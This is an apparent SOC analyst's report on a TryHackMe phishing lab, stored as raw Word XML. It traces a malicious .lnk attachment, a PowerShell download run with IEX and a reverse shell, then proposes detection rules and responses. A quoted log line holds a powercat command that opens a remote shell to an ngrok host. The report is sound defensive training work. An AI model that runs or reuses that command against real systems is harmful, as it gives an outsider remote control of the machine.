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48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Detection Engineering &amp; Alert Design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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: Barbara Adkins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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Role: SOC Analyst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40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary: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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The TryHackMe scenario, Phishing Unfolding, simulates a real-time triage situation. It is neccessary to determine if an alert is serious and if so, what to do about it. Below you will see my findings regarding the phishing attack with screenshots.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z w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this scenario, a phishing email attack occurred and allowed the bad actor to obtain access to the network beginning with a phishing email. The impact on the network environment is high because access to the system without proper clearance can lead to the loss or misuse of many forms of data, for example, accounting information, proprietary knowledge or personal information of individual employees.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sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Breakdown: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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it occurred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email from hatmakereurope.xyz was sent to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">michael.ascot@tryhatme.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an urgent subject line and body with an attached file, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ImportantInvoice-Febrary.zip.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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="863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Mr. Ascot clicked on the zipped file, which sysmon detected, and the alert showed that a file stream was created in temp files, but we see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ImportantInvoice-Febrary\\invoice.pdf.lnk.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\\invoice.pdf.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicates that there was a hidden file in the zip file.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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="584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sysmon alert shows the launching of the hidden file, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">invoice.pdf.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This opened PowerShell and created powercat.cs1. This allowed a download from GitHub, as PowerShell has a cmdlet, IEX (seen on the third line), which is used in attack scripts to execute malicious code in memory without writing to disk.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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="8509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Powercat.ps1 was used to create a reverse bridge between the host and the bad actor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This could then be used to transfer data between the two. The -c lets us know it is a command running on TCP to an endpoint on port 19282. The -e indicates execution of the PowerShell code that follows.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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="3c444d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="fef2d7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="3c444d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 2.tcp.ngrok.io -p 19282 -e powershell\tEngineVersion=5.1.20348.1366\tRunspaceId=b980ae09-17ad-4495-b218-4b1e52190205\tPipelineId=1\tScriptName=\tCommandLine=      Write-Verbose \"Setting up Stream 1...\" Details: CommandInvocation(Write-Verbose): \"Write-Verbose\"ParameterBinding(Write-Verbose): name=\"Message\"; value=\"Setting up Stream 1...\"","host.name":"win-3450","powershell.command.name":"-","winlog.process.pid":"-","powershell.command.invocation_details.value":"\"Write-Verbose\", \"Setting up Stream 1...\""}</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two nslookup.exe actions associated with this attack:</w:t>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Fonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RmYjEyNGZiMTY1NjZlfQ</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haz4rdw4re.io</w:t>
        </w:r>
      </w:hyperlink>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VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ==.haz4dw4re.io.</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I believe that these are an attempt to join two parts of information that can be reassembled into a whole to create the reverse tunnel.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shd w:fill="1c2538" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="723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shd w:fill="1c2538" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5943600" cy="13081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8"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of the malicious email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Sender: hatmakereurope.xyz Note that this is not a normal top level domain.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Subject Line: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FINAL NOTICE: ….Overdue Payment.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This creates a sense of urgency.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Body of email: Urgent: Your account is 30 days past due…. Click the attached invoice immediately… This also creates a sense of urgency so that the user will click without question.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Attachment Name: ImportantInvoiceFebrary.zip. Note that February is misspelled, which could have been just a typo but in retrospect is an IOC indicator.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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Interaction: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Michael Ascot clicked the zip file in the email which triggered the invoicepdf.lnk being installed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8"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Execution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See above in the attack breakdown for more information.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After invoice.pdf.lnk was activated, the creation of the two-part haz4rdw4re.io allowed for the tunnel creation between the internal and external hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suspicious processes or behavior included the .lnk script, which launched PowerShell. The hidden script allowed powercat.ps1 to be used. There were unusual parent/child relationships. There was creation of temp files that correlate to the malware execution.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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Compromise Activity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Based on the triage results, after initial access, a network drive was mapped to a local drive (Alert 1022) and subsequently disconnected (Alert 1024). Further activity included a series of high-severity alerts for suspicious parent-child process relationships (Alerts 1025-1033), which indicate the attacker executing additional commands through the established reverse shell.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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Opportunities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The sender’s email address: Did the recipient know them? Did they recognize the top-level domain?</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The subject line and body of the email both create a false sense of urgency.</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Attachment name: the misspelling of February and possibly the timing of the invoice.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After the attachment was opened, as soon as the pdf.lnk was detected</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Powershell.exe was activated. This suspicious behavior could have triggered an investigation.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first three opportunities were found in the email itself. Should those have been noticed, the attack may not have been successful. The last two could have, once noticed, triggered an isolation of Mr. Ascot's system and minimized any damage caused.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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Rules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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection name: Email Awareness</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Logic: If an email is received from an unfamiliar domain, with zipped files or other unusual information, then do not engage until it has been investigated.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Source: for email attacks, the logs regarding the email itself.</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection name: Unusual Parent/Child relationship</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Logic: If the event shows an unusual parent/child relationship, then view the log for more information. For example, explorer.exe opens PowerShell to run code that may be malicious.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data: Check the event logs.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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Name: Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Logic: If the system is making unexpected connections on known ports, then investigate the logs.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data: Check the logs for indications that the connection was completed.</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sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC WORKFLOW INTEGRATION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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each action would create an entry into the logs based on what looks to be unusual behaviour. To do the triage, check SIEM using the appropriate log files and read it carefully to determine if the threat is legitimate or a false positive. If the event creates further activity, such as opening PowerShell to execute code, escalate the event. Depending on the level of the threat, escalation with low, med, or high severity should occur. For example, if the event targets an important person, department or information, then escalate the event with high severity.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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">False Positives and Tuning</w:t>
      </w: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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any behaviour that looks, on the surface, like malicious behaviour could trigger a false positive. For example, opening an email from an unusual source or clicking a misspelled zip file. To reduce the number of false positive events, a review of past false positive results and then an adjustment of the detection levels and rules accordingly.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sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Gaps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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the email filtering rules had not been set where they were, then the opening of the original attachment might have been missed. Also, as a result, the hidden file, invoice.pdf.lnk, would not have been found.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ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To improve visibility, use comprehensive email logs that track the metadata information.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also, the use of activity logs for users would help track suspicious activity.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate the affected computer from the network to prevent further issues until a thorough scan is completed and it is cleared for the network.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change network email settings to block the sender's domain.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set email filters on the network that would use a separate security filter to check all inbound traffic.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Term Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement the running of test emails to see if people recognize a potential phishing attempt. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
